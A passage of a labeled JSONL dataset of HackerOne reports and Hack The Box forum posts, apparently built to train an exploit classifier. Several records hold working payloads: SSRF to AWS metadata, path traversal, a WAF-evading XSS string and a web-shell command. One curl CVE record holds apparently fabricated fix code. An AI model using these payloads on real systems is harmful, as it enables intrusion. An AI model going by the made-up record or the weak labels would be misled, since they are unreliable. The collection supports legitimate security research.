"cf3dd9976ba8730060d1", "text": "Solution for the issue Dear Academy members, For anybody still having the NT_STATUS_IO_TIMEOUT issue in the Windows Fundamentals Module, the reason causing your inability to ping/interact with the machine (besides port 3389 ) is the Windows Defender Firewall . In order to fix the issue, you must open the Windows Defender Firewall settings in the target machine. image 675×668 91.1 KB Head into the Turn Windows Defender Firewall on or off section, and turn off the options. Best of luck with your studies! lypd0", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-09-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2b3704ee216f3ac62428", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32205: Set-Cookie denial of service\n\nA malicious server can serve excessive amounts of Set-Cookie: headers in a HTTP response to curl and curl stores all of them. A sufficiently large amount of (big) cookies make subsequent HTTP requests to this, or other servers to which the cookies match, create requests that become larger than the threshold that curl uses internally to avoid sending crazy large requests (1048576 bytes) and instead returns an error.\n\nThis denial state might remain for as long as the same cookies are kept, match and haven't expired. Due to cookie matching rules, a server on foo.example.com can set cookies that also would match for bar.example.com, making it it possible for a \"sister server\" to effectively cause a denial of service for a sibling site on the same second level domain using this method.\n\n## Impact\n\nDenial of service", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-32205"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "54cfc237799a5a43d383", "text": "[Cross-Site Request Forgery (CSRF)] CSRF to XSS in /htdocs/modules/system/admin.php\n\n## Summary:\n\nThe ```memberslist_id``` and ```memberlist_uname[]``` POST parameters in the scenario \"/htdocs/modules/system/admin.php\" are affected by XSS due to lack of user supplied data filtration. Due to lack of CSRF token verification it is possible for attacker to craft special web page, which will perform request to the vulnerable ImpressCMS application on authorised user behalf, upon visiting it. \n\n## ImpressCMS branch :\n\nImpress CMS version: 1.4.2\nPHP Version: 7.2.24\n\n## Browsers Verified In:\n\nFirefox 85.0\n\n## Steps To Reproduce:\n\n 1) Host a web server with the following page (note that url in form action should be modified with your testing address)\n\n```\n\n \n \n /htdocs/modules/system/admin.php?fct=mailusers\" method=\"POST\">\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\n```\n 2) Login to your ImpressCMS application with privileged account\n 3) In the same browser open web page from step 1 and click \"Submit request\"\n 4) See the XSS payload fired \n\n## Suggestions to mitigate or resolve the issue:\nProperly sanitise user input using built-in ```StopXSS``` function. Properly check CSRF token\n\n## Credits\nThis bug was found as a part of Solar Security CMS Reseach, with https://hackerone.com/d0bby, https://hackerone.com/wezery0, https://hackerone.com/silvereniqma in collaboration. Can you, please, add them to this report?\n\n## Impact\n\nCSRF leading to XSS", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5a5791cae2ffc6c93cf1", "text": "curl -s https://www.inlanefreight.com | grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\" | sort -u | wc -l Description: curl -s retrieves the HTML content of the webpage https://www.inlanefreight.com in a silent mode without showing progress meter or error messages. grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\" searches for all the links within the HTML content of the webpage by matching the regular expression (http|https)://[a-zA-Z0-9./?=_-]* . This regular expression matches any string that starts with http:// or https:// followed by any combination of letters, digits, slashes, question marks, underscores, and dashes. sort -u sorts and removes any duplicate links from the output. wc -l counts the number of lines in the output, which represents the total number of unique links found on the webpage.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-05-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6e3b5602dbfab4476abd", "text": "[Server-Side Request Forgery (SSRF)] SSRF ACCESS AWS METADATA - █████\n\nHi Security Team,\nBased on https://hackerone.com/hack-us-h1c challenge, I have urgent vulnerability and the challenge doesn't accept reprots for now 1:56 AM \n.\nI have found a SSRF Vulnerability which allow access to the AWS metadata, using Parameter `?url=` as shown blew\nAn attacker can tunnel into internal networks and access sensitive internal data such as AWS meta data information.\n\n.\n**Http Request**\n```http\nGET /api/v1/download-url?url=http://█████/latest/meta-data/ HTTP/1.1\nHost: ████████\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nAccess-Control-Allow-Origin: *\nReferer: https://████/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n\n```\n.\n**Http Response**\n```http\nHTTP/1.1 200 OK\nServer: nginx/1.21.6\nDate: Mon, 04 Jul 2022 05:42:12 GMT\nContent-Type: text/plain\nConnection: close\nStrict-Transport-Security: max-age=31536000; includeSubdomains\nX-Frame-Options: DENY\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nContent-Security-Policy: object-src 'none'; script-src 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https: http:;\nFront-End-Https: on\nContent-Length: 313\n\nami-id\nami-launch-index\nami-manifest-path\nblock-device-mapping/\nevents/\nhostname\nidentity-credentials/\ninstance-action\ninstance-id\ninstance-life-cycle\ninstance-type\nlocal-hostname\nlocal-ipv4\nmac\nmetrics/\nnetwork/\nplacement/\nprofile\npublic-hostname\npublic-ipv4\npublic-keys/\nreservation-id\nsecurity-groups\nservices/\n```\n.\n.\n**SCREEN SHOT**\n████\n.\n.\n\n## Impact\n\nSSRF Vulnerability \nRemote Access to AWS metadata\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1 - Visit https://██████████\n2 - Press 'Import from URL' Button & Enter SSRF Payload in the Dialog Box\n3 - Intercept the Request & observe the response\n\n## Suggested Mitigation/Remediation Actions\nSanitize user supplied input in paramter `?url=`\nBlock access to internal networks", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7ea106e98a051600dcf6", "text": "[Path Traversal] Internal machine learning API endpoint for CWE classification is vulnerable to path traversal\n\nHackerOne has an internal machine learning API that exposes inference endpoints for numerous machine learning / artificial intelligence solutions. In one of the endpoints, `/predict/report_weakness_id`, which is used to classify report input, a path traversal vulnerability exists that could lead to remote code execution.\n\n# Proof of concept\nThe `request.version` and `request.trained_at` parameters are both vulnerable to path traversal. To reproduce, run any of the following curl commands inside the local Docker container:\n\n**trained_at**\n```\ncurl -X POST http://localhost:8082/predict/report_weakness_id -H 'content-type: application/json' -d'{\"version\":\"v1\", \"trained_at\": \"2023-01-01T00:00:00Z/../../..\", \"input\": [{\"title\": \"test xss\", \"num_of_top_predictions\": 3}]}'\n```\n\n**version**\n```\ncurl -X POST http://localhost:8082/predict/report_weakness_id -H 'content-type: application/json' -d'{\"version\":\"v1/../../../..\", \"trained_at\": \"2023-01-01T00:00:00Z\", \"input\": [{\"title\": \"test xss\", \"num_of_top_predictions\": 3}]}'\n```\n\nThe vulnerable code is shown below. The `version` and `trained_at` inputs are interpolated directly into the path, as can be seen on line 29. The `AutoTokenizer.from_pretrained` function is then called to load the tokenizer into memory.\n\n```python\n@app.post(\n \"/predict/report_weakness_id\",\n summary=\"An endpoint to suggest report's weakness id.\",\n)\nasync def report_weakness_id(request: ReportWeaknessIdModelRequest):\n \"\"\"\n To try the endpoint in the Swagger UI, click on **Try it out** and copy-paste the below example in the request body box\n ```\n {\n \"version\":\"v1\",\n \"trained_at\": \"2023-01-01T00_00_00Z\",\n \"input\": [\n {\n \"title\": \"test xss\",\n \"num_of_top_predictions\": 3\n }\n ]\n }\n ```\n \"\"\"\n input = request.input[0]\n title = preprocess_text(input.title)\n\n top_n = int(\n input.num_of_top_predictions or 3\n ) # as a start, it's by default set as 3\n\n model_dirpath = pathlib.Path(\n f\"{os.path.dirname(__file__)}/../models/report_weakness_id/{request.version}/{request.trained_at}/\"\n )\n\n tokenizer = AutoTokenizer.from_pretrained(model_dirpath, use_fast=True)\n```\n\n## Impact\n\nAn attacker would be able to execute arbitrary python code if they were able to get a joblib file onto the ML API (i.e. as a temporary file).", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ffd87bdf8b4a6bbe8326", "text": "[Violation of Secure Design Principles] Bypassing CORS Misconfiguration Leads to Sensitive Exposure at https://███/\n\n**Summary:**\nIt's possible to get information about the users registered (such as: id, name, login name, etc.) without authentication in WordPress via API on https://██████████/.\n\n**Description:**\nThere exists a cross-origin resource sharing (CORS) misconfiguration vulnerability at https://█████/, allowing anyone from any third-party domain to perform two-way interaction with this domain. Generally, CORS policy is used to determine whether the content in a website can interact with another specific website or not and whether the another specific website can directly fetch the content from the original website or not.\n\nCORS policy is implemented in web applications, by whitelisting/allowing company's other assets to fetch dynamic resource from the specific asset, and not allowing the rest of the third-party domains to access or fetch the content. However, the situation is different in case of this vulnerable domain, allowing anyone to fetch the resource.\n\n## Step-by-step Reproduction Instructions\nStep 1. Visit https://████/wp-json/, and you will see that it displays user IDs, names, login usernames, etc. without requiring any form of authentication;\nStep 2. Now, it is time to craft a Proof-of-Concept exploit for the CORS misconfiguration vulnerability using JavaScript. For this purpose, you may use the following piece of code:\n\n```html\n\n\n
\n\n
\n\n
\n\n\n\n\n\n```\n\nCopy this piece of code, and place in a file with **.html** extension, and visit the file in your web browser!\n\nStep 3. When you are viewing the exploit file in your browser, click on the button available there, and then it will fetch the resource from the target vulnerable website.\n\n## Product, Version, and Configuration (If applicable)\n- https://██████████/\n\n## Suggested Mitigation/Remediation Actions\nTo fix this vulnerability, you can use a whitelist of trusted domains rather than defining a wildcard or programmatically verifying the supplied origins.\n\n## Impact\n\nBy taking an advantage of this vulnerability, an attacker would be able to fetch contents from the vulnerable domain despite being in a third-party domain, not in the asset of the vulnerable domain. The contents that the attacker can fetch include the WordPress user IDs, usernames, and other information.\n\nDespite the wp-json API endpoint being a public information by default, there exists CORS misconfiguration in this website, that allows any website to fetch resources from this particular vulnerable domain.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Visit https://█████████/wp-json/wp/v2/users/\n2. Use the exploit PoC code mentioned earlier!\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "93d20f1de0a594425ccd", "text": "did you try to grep the output of the error.log file ??", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "789fee3c3b19bebab2f4", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS in ██████\n\n**Description:**\nXSS vulnerability found on one of `█████` subdomains. [ DoD scope]\n\nAfter analyzing `https://████████/`(██████████), I found `Admin/Notifications/PreviewLetterhead.aspx` page that have `emailbody` parameter in `GET` request. `emailbody` parameter vulnerable to XSS vulnerability.\n\n`https://███/` requires a valid user to access the contents, but the registration page is accessible to all visitors without any restrictions or credentials.\n\n███████\n- Email confirmation is not required during the registration process.\n- There is no limit to the use of disposable email addresses.\n\nA valid registered user can access the target page after login.\nBy modifying `emailbody` parameter and set the payload to `emailbody=0xd3adc0de%26lt;ScRiPt%26gt;alert(%27XSS%20Success!%27)%26lt;/sCripT%26gt;` the alert box has been triggered.\n\nTo bypass WAF, the payload encoded using these method:\n1. `0xd3adc0de`\n2. HTML encode: `0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>`\n3. URL encode: `0xd3adc0de%26lt;ScRiPt%26gt;alert(%27XSS%20Success!%27)%26lt;/sCripT%26gt;`\n\nPayload:\n`https://██████████/Admin/Notifications/PreviewLetterhead.aspx?emailbody=0xd3adc0de%26lt;ScRiPt%26gt;alert(%27XSS%20Success!%27)%26lt;/sCripT%26gt;`\n███\n\n----\n\n\n**Bonus: Information leakage**\nSome information is leaked on the registration page, I have no idea about the level of confidentiality but I think you should review them. Such as `Organization` and `Manager` field is interesting.\n- About `162 organization` listed on registration page.\n█████████\n\n- About `144366 manager` listed on registration page.\n████\n\n\n## References\nhttps://owasp.org/www-community/attacks/xss/\n\n## Impact\n\nBy exploiting this vulnerability an attacker can trick the users to execute XSS and steal user's cookies.\nLaunch advanced phishing attacks.\nExecute browser-based attacks etc.\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n* Visit the following URL \n`https://█████`\n\n* Login into system using a valid user credential or if you haven't so go to registration page and take one. `https://██████/Disclaimer.aspx?user=new`\n\n* After success login, change the URL to `https://█████/Admin/Notifications/PreviewLetterhead.aspx?emailbody=0xd3adc0de%26lt;ScRiPt%26gt;alert(%27XSS%20Success!%27)%26lt;/sCripT%26gt;` and you will receive `XSS Success!` alert box.\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7ff67e70fb7c863d103a", "text": "[Improper Access Control - Generic] Verifying email bypass\n\nDuring an assessment made on a separate web-application using theirs customers to use Stripe for their payments, I detected a different behavior between account created using the standard interface and the account created using the connect portal.\n\n## Classic User creation.\n\nUsers can create their account using the classic interface on https://dashboard.stripe.com\n\n![](./classicAccountCreation.png)\n\nBy analyzing the traffic, we can see that the user is created with a POST request made on https://dashboard.stripe.com/ajax/register.\n\n![](./ClassicRegisterAccountRequest.png)\n\nThe new user can directly access to the dashboard without verify the email address entered in the creation form. However till the user has not verified the email, all features were limited to test data.\n\n![](./LimitedAccountWithClassicCreation.png)\n![](./LimitedAccountWithClassicCreation2.png)\n\nThese restrictions did not allowed to generate invoices or payments on behalf of **not verified mail** the mail entered during the creation process.\n\n## Connect User creation.\n\nStripe API proposed some Oauth features described in this article (https://stripe.com/docs/connect/oauth-reference).\n\nThe workflow begin with this type of url : https://connect.stripe.com/oauth/authorize?response_type=code&client_id={{CLIENT_ID}}****\n\nOnce the user reached this page, he has two options :\n * Sign-in with an existing account.\n * Create a new account.\n\n The second option asked to the users several informations such as \n\n * Personnal details (name, last name, adress)\n * Business details (website, activities, company adress etc)\n * Email adress\n * Bank details\n\n Second factor with SMS is required and verified for the account creation.\n\n![](./CreateWithConnect.png)\n![](./CreateWithConnect2.png)\n![](./CreateWithConnect3.png)\n![](./CreateWithConnect4.png)\n\nOnce all required informations has been filled and validated, the account is created using the API endpoint and the users is redirected to the client page with the access token generated.\n\n![](./accountCreatedUsingApi.png)\n\nBy the way, by browsing the dashboard website, the user is connected with the new account.\n\n## Vulnerabilty.\n\nInstead of the user created with the standard interface, the account created with the API can access to all Stripe feature such as :\n\n* Creating invoices and send them by email.\n* Creating subscriptions.\n* Managing customers.\n* etc...\n\nThe main concern is the email adress is not verified at this moment, it means that an attacker can impersonate a real company by spoofing the emails address.\n\n## Impact\n\nIn the POC scenario, I created the account superadmin@michelin.com for Michelin Group company. Even if I don't have access to this email, I was able to spoof invoices for Michelin. \n\nThe invoices received by customers are valid because sent by Stripe and saying that superadmin@michelin.com generated the invoice.\n\n![](./NotVerifiedAccountButActive.png)\n![](./branding.png)\n![](./InvoicesCreated.png)\n![](./createinvoice2.png)\n![](./invoiceReceived.png)\n\nThe generated invoice cannot be considered a spam as it was sent by Stripe...\n\nTo complete the report, I generated some little invoices to validate the payment and the payout to the attacker bank.\n\n![](./balance.png)\n![](./paymentsMade.png)", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4cb71301e6ad27d3f0ce", "text": "Command injection, commix error\n\nHey, I would like to ask you guys whether you receive an error while testing commix that says: unable to specify host:”target.comHttps”. I noticed that when commix reads a requestFile.txt it automatically adds or somehow reads the host:” target.com ” as “target.comHttps”.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-04-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2176f84416527a1252bc", "text": "[Open Redirect] Open redirect found on account.brave.com\n\n## What is open redirect\nA web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.\nAn http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.\n\n## Step to reproduce\nvisit https://account.brave.com//example.com/%2F.. you will redirect to example.com\n\n## POC\n{F1446362}\n\n## Fix / prevention\nYou can prevent redirects to other domains by checking the URL being passed to the redirect function. Make sure all redirect URLs are relative paths – i.e. they start with a single / character. (Note that URLs starting with // will be interpreted by the browser as a protocol agnostic, absolute URL – so they should be rejected too.)\n\nIf you do need to perform external redirects, consider whitelisting the individual sites that you permit redirects to.\n\n## Impact\n\nOne of the main uses for this vulnerability is to make phishing attacks more credible and effective. When an Open Redirect is used in a phishing attack, the victim receives an email that looks legitimate with a link that points to a correct and expected domain.\n\nLet me know if you have any questions.\n\nthanks & best regards", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d34929541ad6ff45851a", "text": "[Improper Access Control - Generic] com.nextcloud.client bypass the protection lock in andoid app v 3.18.1 latest version.\n\n## Summary:\nnextcloud allowed multiple account within the android client app on a single lock \n\n\n## Steps To Reproduce:\n1.open nextcloud app \n2.add security password to protect the app \n3.close the app \n again open the app and now show the password to open the app \n\n 1. so now the password protection bypass lets start\n 2.hold the nextcloud app and see the app info open it\n 3.Here the three option 1.open.2.uninstall and 3.force stop\nnow click open button and now see the app lock protection in the app and now open app and back open and back between 3 to 4 time \nsame procedure and now you will see the app lock protection bypass in nextcloud android app\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nif an attacker has physical access to an android mobile without screen lock,but with nextcloud installed and set up,he can easily access the nextcloud-files.\n\n\nregards:Javed Ahmad", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8228638e6549471b1155", "text": "[Improper Access Control - Generic] CORS Misconfiguration in https://████████/accounts/login/\n\n**Description: Cross-origin resource sharing (CORS) is a browser mechanism that enables controlled access to resources located outside of a given domain. However, it also provides a potential for cross-domain-based attacks, if a website's CORS policy is poorly configured and implemented. CORS can be exploited to trust any arbitrary domain attacker-controlled domain name and send the data to it. Attackers can make an exploit and ask the domain to send data of the victim to the attacker domain.\n\nAs you can see when we run the above request in Burp Suite.\nAccess-Control-Allow-Origin: evil.com\nAccess-Control-Allow-Credentials: true\n\n## Impact\n\nAn Adversary can carry out a CORS attack to exfiltrate the sensitive details of a victim.\n\n## System Host(s)\n████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nFirst, put any information in the user and password: put any wrong information and send it and pick up the request\n\nyou will see the (Origin:) Edit it and put evil.com and it will look like this \n\n```\nPOST /accounts/login/ HTTP/1.1\n\nHost: ██████\n\nCookie: _ga_8P65SJGTV5=GS1.1.1667594184.4.0.1667594184.0.0.0; _ga=GA1.1.1314420854.1667559540; csrftoken=JvozZTiwMukzgt7inOPsCLhG2hVTT98qt7mybOSNtumWh0D3w9xIJS4cOePatlet\n\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\n\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n\nAccept-Language: en-US,en;q=0.5\n\nAccept-Encoding: gzip, deflate\n\nContent-Type: application/x-www-form-urlencoded\n\nContent-Length: 117\n\nOrigin: https://evil.com\n\nReferer: https://█████/accounts/login/\n\nUpgrade-Insecure-Requests: 1\n\nSec-Fetch-Dest: document\n\nSec-Fetch-Mode: navigate\n\nSec-Fetch-Site: same-origin\n\nSec-Fetch-User: ?1\n\nTe: trailers\n\nConnection: close\n\n\n\ncsrfmiddlewaretoken=KLecVs84vqKcXOXH0olIf9HCjSIsW9sDuncb7nIlcqMzYlts9J3Ymgu85PCJwlyG&█████\n```\n\nresponse\n\n```\nHTTP/1.1 200 OK\n\nServer: nginx/1.23.0\n\nDate: Fri, 11 Nov 2022 16:36:45 GMT\n\nContent-Type: text/html; charset=utf-8\n\nContent-Length: 3371\n\nConnection: close\n\nExpires: Fri, 11 Nov 2022 16:36:45 GMT\n\nCache-Control: max-age=0, no-cache, no-store, must-revalidate, private\n\nVary: Cookie, Origin\n\nX-Frame-Options: DENY\n\nAccess-Control-Allow-Credentials: true\n\nAccess-Control-Allow-Origin: https://evil.com\n\nAccess-Control-Expose-Headers: ETag, Last-Modified, Cache-Control, Content-Type, Content-Length, WWW-Authenticate, X-Experience-API-Version, Accept-Language\n\nSet-Cookie: csrftoken=JvozZTiwMukzgt7inOPsCLhG2hVTT98qt7mybOSNtumWh0D3w9xIJS4cOePatlet; expires=Fri, 10 Nov 2023 16:36:45 GMT; Max-Age=31449600; Path=/; SameSite=Lax\n\n\n\n\n\n\n \n \n \n\n \n \n \n \n\n \n \n \n \n \n \n\n\n █████████ Login\n\n\n\n
\n
\n
\n
\n \n \n
\n LONG_MAX) {\n va_end(param);\n return CURLE_BAD_FUNCTION_ARGUMENT;\n }\n\n ret = curl_easy_setopt_timeout(handle, timeout);\n break;\n }\n\n default:\n ret = curl_easy_setopt_custom(handle, option, param);\n break;\n }\n\n va_end(param);\n\n return ret;\n}\nUse code with caution. Learn more\nThese code changes were made in commit 9414975, which was released in curl version 8.4.0.\n\n\nWho made these changes and commit details:\nThe code changes to fix CVE-2023-38545 were made by Dxxxxl Sxxxxg, the maintainer of curl. The changes were made in commit 9414975, which was released in curl version 8.4.0.\n\nDxxxxl Sxxxxg is a Swedish computer programmer and the creator and maintainer of curl. He has been working on curl for over 20 years and is considered to be one of the leading experts on web transfer protocols.\n\n## Impact\n\nDisclosing undisclosed vulnerability code can have a number of negative implications, including:\n\nPutting users at risk. Once a vulnerability is disclosed publicly, attackers can start exploiting it. This can put users of the affected software at risk of data breaches, malware infections, and other attacks.\nDamaging the vendor's reputation. Vendors take pride in the security of their products and services. Disclosing a vulnerability publicly can damage the vendor's reputation and lead to lost customers.\nMaking it more difficult for the vendor to fix the vulnerability. If a vulnerability is disclosed publicly before the vendor has a chance to fix it, it can make it more difficult for the vendor to coordinate a patch release. This can leave users vulnerable to attacks for longer.\nEncouraging other attackers to find and disclose vulnerabilities. When attackers see that they can get attention and recognition by disclosing vulnerabilities, they are more likely to look for them. This can lead to an increase in the number of vulnerabilities that are disclosed publicly.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-38545"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c8c4cc8b197c6b51223c", "text": "[Cross-site Scripting (XSS) - Stored] Universal XSS with Playlist feature\n\n## Summary:\n\nBrave iOS has three weaknesses described below. By combining them, Universal XSS can be achieved.\n\n1. Exposure of UserScriptManager.securityToken\n[Playlist.js](https://github.com/brave/brave-ios/blob/fdff99ca3997816322015fe5efcd63490193b88d/Client/Frontend/UserContent/UserScripts/Playlist.js#L353) embeds the exact value of the `$` into `HTMLVideoElement.prototype.setAttribute`. By reading the value, an attacker can retrieve the hidden security token.\n\n2. Exposure of UserScriptManager.messageHandlerToken\nAlso, [WindowRenderHelper.js](https://github.com/brave/brave-ios/blob/83eb41ac922d7bd18fd311e0a4279e02cdd8e190/Client/Frontend/UserContent/UserScripts/WindowRenderHelper.js#L12) embeds the exact value of the `$` into `W{securityToken}.postMessage`. By reading the value, an attacker can retrieve the hidden message handler token.\n\n3. UXSS in PlaylistHelper through nodeTag\n[PlaylistHelper.swift](https://github.com/brave/brave-ios/blob/83eb41ac922d7bd18fd311e0a4279e02cdd8e190/Client/Frontend/Browser/PlaylistHelper.swift#L228) concatenates strings to build a JavaScript code and executes it on the mainframe of a WebView. Then, `nodeTag` given from a webpage is directly included in the code. So, if the `nodeTag`, named as `tagId` in JS world, passed from the page contained `');alert(document.location);//`, unintended `alert()` is executed on the mainframe.\n\n## Products affected: \n\n * Brave iOS 1.32.3 and higher (include the latest Nightly)\n\n## Steps To Reproduce:\n\n * Visit the Google page: https://sites.google.com/view/nishimunea-brave-uxss1/page\n* This page contains a cross origin malicious page https://csrf.jp/brave/playlist.php in an iframe\n* The iframe exploits the above three weaknesses to send a message to playlistHelper\n* Push `Add to Brave Playlist` and `Open` button in the setting menu\n* An alert dialog is appear on the sites.google.com\n\n## Supporting Material/References:\n\n * Demonstration movie is attached\n\n## Impact\n\n* Universal XSS on the arbitrary domains", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4138cc1d0bb900eed4f8", "text": "Three start point\n\nHi every one. Can i ask for the machine Three in start point is still alive. How i can use the command=id. I upload shell.php already but the url is not work for use cmd. I try 10 times but it is same problem. I do not have any idea for that. any one can help me plssssss!!! get /shell.php?command=id HTTP/1.1 response : HTTP/1.1 404 Not Found I had checked in aws in thetoppers.htb, there was shell.php aleady.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "94f3f29fa3fd208e2d0f", "text": "[Unknown] [Java] CWE-016: Query to detect insecure configuration of Spring Boot Actuator\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d16d0f0c086351ebca32", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS on ██████.mil\n\n**Description:**\nWhile looking for *.mil, I found a website that is vulnerable to reflected XSS.\n\n## Impact\n\nAn attacker can use it to fetch cookies/tokens from any website which requires login by using a CORS bug if the site is vulnerable to CORS.\n\n## System Host(s)\n████.mil\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Go to this URL: https://███████████████████html\n2. On the search bar, write this payload. \n3. & you'll see the pop-up.\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "722039ed387801f23dfc", "text": "Thanks for both the question and the clarification. The question is incorrect in that it is asking for something other than what it wants. It asks for the address of EBP when it wants the value (pattern) within EBP. Other people have reported this and the question should really be fixed. An aside, IMHO, a better question would be to ask for the pattern offset of EBP. Determining the correct pattern offset implies the student knows both how to examine EBP’s value as well as apply other techniques outlined within the lesson. To be clear, I am really enjoying the module, and other modules in the path, but wanted to share my two cents on this.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-10-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5be8c025ec17ea05c9ef", "text": "[Information Disclosure] Private information exposed through GraphQL search endpoints aggregates\n\n**Summary:**\n\nPrivate information can be exposed using `aggs` argument on the `search` and `opportunities_search` endpoints on the GraphQL root node. \n\n**Description:**\n\nWhen using the `aggs` argument and return field on the `search` and `opportunities_search` endpoints, the data returned in the `aggs` can potentially contain private information. It can for example be used to expose handles of private programs, and other data that can be aggregated by. \n \n### Steps To Reproduce\n\nSpecific example to expose private team handles, but other things can be exposed in the same way using this or other indexes on the `search` endpoint.\n\n1. Open and run any GraphQL client, or modify an existing GraphQL request\n2. Run a query with an aggregate for a field which could contain private information. The provided query can be tweaked to get more specific results.\n```\n# Write your query or mutation here\nquery {\n me {\n id\n }\n opportunities_search(query:{}, aggs:{results:{terms: {field:\"handle\"}}}) {\n aggs\n }\n}\n```\n\n3. The output will show aggregations by the `handle` which are not filtered on whether they are private or not. \n\n```\n{\n \"data\": {\n \"me\": null,\n \"opportunities_search\": {\n \"aggs\": {\n \"results\": {\n \"doc_count_error_upper_bound\": 0,\n \"sum_other_doc_count\": 37,\n \"buckets\": [\n {\n \"key\": \"private\",\n \"doc_count\": 1\n },\n {\n \"key\": \"private\",\n \"doc_count\": 1\n },\n {\n \"key\": \"private\",\n \"doc_count\": 1\n },\n {\n \"key\": \"private\",\n \"doc_count\": 